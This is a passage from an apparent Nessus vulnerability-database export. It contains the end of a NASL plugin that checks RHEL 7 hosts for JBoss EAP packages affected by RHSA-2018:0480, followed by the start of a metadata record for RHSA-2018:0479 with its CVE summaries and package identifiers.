value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/09/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:0480\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL7\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-cli-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-commons-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-core-client-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-dto-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-hornetq-protocol-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-hqclient-protocol-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-jdbc-store-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-jms-client-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-jms-server-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-journal-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-native-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-ra-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-selector-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-server-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-activemq-artemis-service-extensions-1.5.5.009-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-apache-cxf-3.1.13-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-apache-cxf-rt-3.1.13-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-apache-cxf-services-3.1.13-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-apache-cxf-tools-3.1.13-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-glassfish-jsf-2.2.13-6.SP5_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-core-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-entitymanager-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-envers-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-infinispan-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-hibernate-java8-5.1.12-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-cachestore-jdbc-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-cachestore-remote-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-client-hotrod-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-commons-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-infinispan-core-8.2.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-common-api-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-common-impl-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-common-spi-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-core-api-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-core-impl-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-deployers-common-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-jdbc-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-ironjacamar-validator-1.4.7-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-annotations-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-core-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-databind-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-datatype-jdk8-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-datatype-jsr310-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-jaxrs-base-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-jaxrs-json-provider-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-module-jaxb-annotations-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jackson-modules-java8-2.8.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-logmanager-2.0.8-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-cli-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-core-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap6.4-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap6.4-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap6.4-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap7.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly10.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly10.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly10.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly10.1-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly8.2-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly8.2-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly8.2-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly9.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly9.0-to-eap7.0-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jboss-server-migration-wildfly9.0-to-eap7.1-1.0.3-6.Final_redhat_6.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-jbossws-cxf-5.1.10-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-compensations-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-jbosstxbridge-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-jbossxts-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-jts-idlj-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-jts-integration-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-restat-api-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-restat-bridge-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-restat-integration-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-restat-util-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-narayana-txframework-5.5.31-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-api-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-bindings-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-common-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-config-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-federation-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-idm-api-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-idm-impl-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-idm-simple-schema-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-impl-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-picketlink-wildfly8-2.5.5-10.SP9_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-atom-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-cdi-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-client-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-crypto-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jackson-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jackson2-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jaxb-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jaxrs-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jettison-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jose-jwt-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-jsapi-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-json-p-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-multipart-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-spring-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-validator-provider-11-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-resteasy-yaml-provider-3.0.25-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-undertow-1.4.18-4.SP2_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-undertow-jastow-2.0.3-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-7.1.1-4.GA_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-elytron-1.1.8-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-http-client-common-1.0.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-http-ejb-client-1.0.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-http-naming-client-1.0.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-http-transaction-client-1.0.9-1.Final_redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-javadocs-7.1.1-3.GA_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wildfly-modules-7.1.1-4.GA_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-bindings-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-policy-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-ws-security-common-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-ws-security-dom-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-ws-security-policy-stax-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-wss4j-ws-security-stax-2.1.11-1.redhat_1.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"eap7-xml-security-2.0.9-1.redhat_1.1.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"eap7-activemq-artemis / eap7-activemq-artemis-cli / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-03-27T15:34:43", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 7.1 for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis release of Red Hat JBoss Enterprise Application Platform 7.1.1 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.1.0, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* artemis/hornetq: memory exhaustion via UDP and JGroups discovery (CVE-2017-12174)\n\n* infinispan: Unsafe deserialization of malicious object injected into data cache (CVE-2017-15089)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-7525) (CVE-2017-15095)\n\n* jackson-databind: Unsafe deserialization due to incomplete black list (incomplete fix for CVE-2017-15095) (CVE-2017-17485)\n\n* resteasy: Vary header not added by CORS filter leading to cache poisoning (CVE-2017-7561)\n\n* undertow: Client can use bogus uri in Digest authentication (CVE-2017-12196)\n\n* undertow: ALLOW_ENCODED_SLASH option not taken into account in the AjpRequestParser (CVE-2018-1048)\n\n* jackson-databind: unsafe deserialization due to incomplete blacklist (incomplete fix for CVE-2017-7525 and CVE-2017-17485) (CVE-2018-5968)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-03-14T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2018:0479)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12174", "CVE-2017-12196", "CVE-2017-15089", "CVE-2017-15095", "CVE-2017-17485", "CVE-2017-7525", "CVE-2017-7561", "CVE-2018-1048", "CVE-2018-5968"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-cli", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-commons", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-core-client", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-dto", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hornetq-protocol", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-hqclient-protocol", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jdbc-store", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-client", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-jms-server", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-journal", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-native", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-ra", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-selector", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-server", "p-cpe:/a:redhat:enterprise_linux:eap7-activemq-artemis-service-extensions", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-rt", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-services", "p-cpe:/a:redhat:enterprise_linux:eap7-apache-cxf-tools", "p-cpe:/a:redhat:enterprise_linux:eap7-glassfish-jsf", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-core", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-entitymanager", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-envers", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-infinispan", "p-cpe:/a:redhat:enterprise_linux:eap7-hibernate-java8", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-jdbc", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-cachestore-remote", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-client-hotrod", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-commons", "p-cpe:/a:redhat:enterprise_linux:eap7-infinispan-core", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-api", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-common-spi", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-api", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-core-impl", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-deployers-common", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-jdbc", "p-cpe:/a:redhat:enterprise_linux:eap7-ironjacamar-validator", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-annotations", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-core", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-databind", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jdk8", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-datatype-jsr310", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-base", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-jaxrs-json-provider", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-module-jaxb-annotations", "p-cpe:/a:redhat:enterprise_linux:eap7-jackson-modules-java8", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-logmanager", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-cli", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-core", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap6.4-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly10.1-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly8.2-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.0", "p-cpe:/a:redhat:enterprise_linux:eap7-jboss-server-migration-wildfly9.0-to-eap7.1", "p-cpe:/a:redhat:enterprise_linux:eap7-jbossws-cxf", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-compensations", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbosstxbridge", "p-cpe:/a:redhat:enterprise_linux:eap7-narayana-jbossxts", 